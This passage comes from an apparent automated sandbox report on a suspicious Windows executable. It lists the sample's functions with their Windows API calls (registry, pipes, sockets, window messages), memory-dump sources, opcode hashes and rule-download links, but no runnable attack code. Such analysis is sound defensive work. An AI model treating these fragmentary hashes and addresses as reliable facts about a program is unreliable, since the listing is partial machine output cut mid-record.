                                                                                • SysFreeString.OLEAUT32 ref: 004B7895
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 004B78AF
                                                                                • SysAllocString.OLEAUT32(?), ref: 004B78BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: c7e10541bba484f0f879259ffaae0c8168e22a255191fa5cd55583d97dd65484
                                                                                • Instruction ID: 80431b556f27a236d416cc180e7227ff6fc7a5c5b8d7fefb0270ad0c987b10c2
                                                                                • Opcode Fuzzy Hash: c7e10541bba484f0f879259ffaae0c8168e22a255191fa5cd55583d97dd65484
                                                                                • Instruction Fuzzy Hash: B2217131608204AFDB10AFB8DCC8DAB77ECEB497607108526F915CB2A1D678DC46CB78
                                                                                Function 004C04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 004C04F2
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C052E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: ff5f99eb11bcd05ac59bec11da0ca88d3ea59e844c7f8b82a1a627d89f0a9b27
                                                                                • Instruction ID: 1cc8f70685700119d761c514f78b764dcafcd35daa5337d6d916b375bdb754a0
                                                                                • Opcode Fuzzy Hash: ff5f99eb11bcd05ac59bec11da0ca88d3ea59e844c7f8b82a1a627d89f0a9b27
                                                                                • Instruction Fuzzy Hash: F0212C79500305EBDF609F69D884F9A7BA4AF44724F204A2EE9A1D62E0D7749942CF28
                                                                                Function 004C05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004C05C6
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004C0601
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandlePipe
                                                                                • String ID: nul
                                                                                • API String ID: 1424370930-2873401336
                                                                                • Opcode ID: 7ca5fa83e7afa85ba399f1bc50ab601d493b45f6ba88ec743b73f90b6a7c4d8d
                                                                                • Instruction ID: dac5f879e01fc21a8bd30cb6fc73f197b3f1cb23fce21c13fcb69a8b085ac7ef
                                                                                • Opcode Fuzzy Hash: 7ca5fa83e7afa85ba399f1bc50ab601d493b45f6ba88ec743b73f90b6a7c4d8d
                                                                                • Instruction Fuzzy Hash: 3B219139600315DBDB608F698C44F9A77A4AF85720F200A1EECA1E72E0D7749861CB18
                                                                                Function 004E40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0045600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0045604C
                                                                                  • Part of subcall function 0045600E: GetStockObject.GDI32(00000011), ref: 00456060
                                                                                  • Part of subcall function 0045600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0045606A
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004E4112
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004E411F
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004E412A
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004E4139
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004E4145
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 9961f775eecc48b07899ad583b84faa82997479c8f0a1f8bf4fc577b51235860
                                                                                • Instruction ID: edcf3fac97081afce0a4c3c16b4f557614f5f719c062c48d6a888c94180ae6ca
                                                                                • Opcode Fuzzy Hash: 9961f775eecc48b07899ad583b84faa82997479c8f0a1f8bf4fc577b51235860
                                                                                • Instruction Fuzzy Hash: 4F11E6B114021D7EEF108F65CC85EE77F5DEF08798F014111BA18A2150C6769C21DBA4
                                                                                Function 0048D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0048D7A3: _free.LIBCMT ref: 0048D7CC
                                                                                • _free.LIBCMT ref: 0048D82D
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 0048D838
                                                                                • _free.LIBCMT ref: 0048D843
                                                                                • _free.LIBCMT ref: 0048D897
                                                                                • _free.LIBCMT ref: 0048D8A2
                                                                                • _free.LIBCMT ref: 0048D8AD
                                                                                • _free.LIBCMT ref: 0048D8B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                • Instruction ID: 7c7e8a1ceae6a3a0d87c3874ad26187ca8b1c9d2c9d493479c286c1155fa1f23
                                                                                • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                • Instruction Fuzzy Hash: FD112CB1A42B04AAD521BFB2CC46FCF7B9C6F00704F400C2AF299A60D2DA6DA5454754
                                                                                Function 004BDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004BDA74
                                                                                • LoadStringW.USER32(00000000), ref: 004BDA7B
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004BDA91
                                                                                • LoadStringW.USER32(00000000), ref: 004BDA98
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004BDADC
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 004BDAB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 4072794657-3128320259
                                                                                • Opcode ID: 50fd440276859624572946bf6def81670feb3a17f07f964db1e6dcfb23b712b7
                                                                                • Instruction ID: b5911536b8d173fe29ff5293361178925c2714c6f735d5d3b7f2b2d5b19a2a74
                                                                                • Opcode Fuzzy Hash: 50fd440276859624572946bf6def81670feb3a17f07f964db1e6dcfb23b712b7
                                                                                • Instruction Fuzzy Hash: E90186F2900348BFEB109BE09DC9EE7776CEB08301F4445A6B716E6042E6749E858F78
                                                                                Function 004C096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(0128EF40,0128EF40), ref: 004C097B
                                                                                • EnterCriticalSection.KERNEL32(0128EF20,00000000), ref: 004C098D
                                                                                • TerminateThread.KERNEL32(006F0074,000001F6), ref: 004C099B
                                                                                • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 004C09A9
                                                                                • CloseHandle.KERNEL32(006F0074), ref: 004C09B8
                                                                                • InterlockedExchange.KERNEL32(0128EF40,000001F6), ref: 004C09C8
                                                                                • LeaveCriticalSection.KERNEL32(0128EF20), ref: 004C09CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: 33733ac389d4b4e601578230328d25c8380d2cdd81ac3057fb6e63f154bfed1b
                                                                                • Instruction ID: bf133f818181e7c6cfd7257182ec2385ce444c541e165d1630a81422323dc8fc
                                                                                • Opcode Fuzzy Hash: 33733ac389d4b4e601578230328d25c8380d2cdd81ac3057fb6e63f154bfed1b
                                                                                • Instruction Fuzzy Hash: F4F03171842642FBD7415F94EECCBD6BB39FF01702F401426F201588A2C7749466CF98
                                                                                Function 00455D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 00455D30
                                                                                • GetWindowRect.USER32(?,?), ref: 00455D71
                                                                                • ScreenToClient.USER32(?,?), ref: 00455D99
                                                                                • GetClientRect.USER32(?,?), ref: 00455ED7
                                                                                • GetWindowRect.USER32(?,?), ref: 00455EF8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$Screen
                                                                                • String ID:
                                                                                • API String ID: 1296646539-0
                                                                                • Opcode ID: b8f5c67d2a04c9fa98a0591e30f0ebcff7b6cf2971253cdffdc4b6cb6af268f0
                                                                                • Instruction ID: 71101542cc2f99033f3d0572dd109bd84f873eb417c301cc9a586ce466e8820f
                                                                                • Opcode Fuzzy Hash: b8f5c67d2a04c9fa98a0591e30f0ebcff7b6cf2971253cdffdc4b6cb6af268f0
                                                                                • Instruction Fuzzy Hash: DEB17B75A0064ADBDB10CFA8C481AFEBBF1FF44311F14841AE8A9D7250D738AA56CB58
                                                                                Function 004801B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 004800BA
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004800D6
                                                                                • __allrem.LIBCMT ref: 004800ED
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048010B
                                                                                • __allrem.LIBCMT ref: 00480122
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00480140
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                • Instruction ID: 3e5a55f186a6504e25b88586f0ca2107b70ecf6f4dfa620d71e121eb4704c1e5
                                                                                • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                • Instruction Fuzzy Hash: B181D6726007069FD720AA69CC41BAF73E8AF41328F24893FF455D7781EB79D9048798
                                                                                Function 004D1D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004D3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,004D101C,00000000,?,?,00000000), ref: 004D3195
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 004D1DC0
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004D1DE1
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1DF2
                                                                                • inet_ntoa.WSOCK32(?), ref: 004D1E8C
                                                                                • htons.WSOCK32(?,?,?,?,?), ref: 004D1EDB
                                                                                • _strlen.LIBCMT ref: 004D1F35
                                                                                  • Part of subcall function 004B39E8: _strlen.LIBCMT ref: 004B39F2
                                                                                  • Part of subcall function 00456D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0046CF58,?,?,?), ref: 00456DBA
                                                                                  • Part of subcall function 00456D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0046CF58,?,?,?), ref: 00456DED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 1923757996-0
                                                                                • Opcode ID: 6fa5e95f46cbb1c7bbb336b86a067b4c737c9768bc912d3aa413fdd228a7220d
                                                                                • Instruction ID: e4ddf03cf64ce5a055fc84c59c6a0b2d596280ed09c84ece4b8b0a36d60567d8
                                                                                • Opcode Fuzzy Hash: 6fa5e95f46cbb1c7bbb336b86a067b4c737c9768bc912d3aa413fdd228a7220d
                                                                                • Instruction Fuzzy Hash: F7A1C031204340AFC324EF21C895E2B77A5AF84318F54895EF8565B3A3DB39ED46CB96
                                                                                Function 004861FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004782D9,004782D9,?,?,?,0048644F,00000001,00000001,8BE85006), ref: 00486258
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0048644F,00000001,00000001,8BE85006,?,?,?), ref: 004862DE
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004863D8
                                                                                • __freea.LIBCMT ref: 004863E5
                                                                                  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                • __freea.LIBCMT ref: 004863EE
                                                                                • __freea.LIBCMT ref: 00486413
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: 73edb10c4273dec0696220d0027b9a1dbd7624d047d977602fcd4d4bf6f5d580
                                                                                • Instruction ID: 0e2dfc48c25c535498d6a2989cdc784448652a73423253a941ae8f74cba80976
                                                                                • Opcode Fuzzy Hash: 73edb10c4273dec0696220d0027b9a1dbd7624d047d977602fcd4d4bf6f5d580
                                                                                • Instruction Fuzzy Hash: 1451E972A00216ABDB25AF64CC81EBF77A9EF44714F164A6AFC05D6241DB38DC41C768
                                                                                Function 004DBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004DB6AE,?,?), ref: 004DC9B5
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DC9F1
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA68
                                                                                  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DBCCA
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004DBD25
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004DBD6A
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004DBD99
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004DBDF3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004DBDFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 1120388591-0
                                                                                • Opcode ID: efbb5dc64fac69180e1331c15060be5fa6c2f9a7434cf46b401fcee0b0ef791f
                                                                                • Instruction ID: 0e3badcd4d3be27500865405fbd750d26fad8f53363a429a400666574536fc60
                                                                                • Opcode Fuzzy Hash: efbb5dc64fac69180e1331c15060be5fa6c2f9a7434cf46b401fcee0b0ef791f
                                                                                • Instruction Fuzzy Hash: 50816970208241EFC714DF24C895E2ABBE5FF84308F15895EF4558B2A2DB35ED09CB96
                                                                                Function 004AF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000035), ref: 004AF7B9
                                                                                • SysAllocString.OLEAUT32(00000001), ref: 004AF860
                                                                                • VariantCopy.OLEAUT32(004AFA64,00000000), ref: 004AF889
                                                                                • VariantClear.OLEAUT32(004AFA64), ref: 004AF8AD
                                                                                • VariantCopy.OLEAUT32(004AFA64,00000000), ref: 004AF8B1
                                                                                • VariantClear.OLEAUT32(?), ref: 004AF8BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                • String ID:
                                                                                • API String ID: 3859894641-0
                                                                                • Opcode ID: 8e4d3fb8d686812a7df766b3bf9756d2a95960d3285b9aa3b0b6528f76652730
                                                                                • Instruction ID: a38a8d2005bbb057a5ef94a5448e58b880ae93ae883f0cf7e011ae1f2fb8480e
                                                                                • Opcode Fuzzy Hash: 8e4d3fb8d686812a7df766b3bf9756d2a95960d3285b9aa3b0b6528f76652730
                                                                                • Instruction Fuzzy Hash: F251E971500300BADF107BA6D495B2AB3A8EF56314F54446BE805DF292D7789C49C79F
                                                                                Function 004C910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 004C94E5
                                                                                • _wcslen.LIBCMT ref: 004C9506
                                                                                • _wcslen.LIBCMT ref: 004C952D
                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 004C9585
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
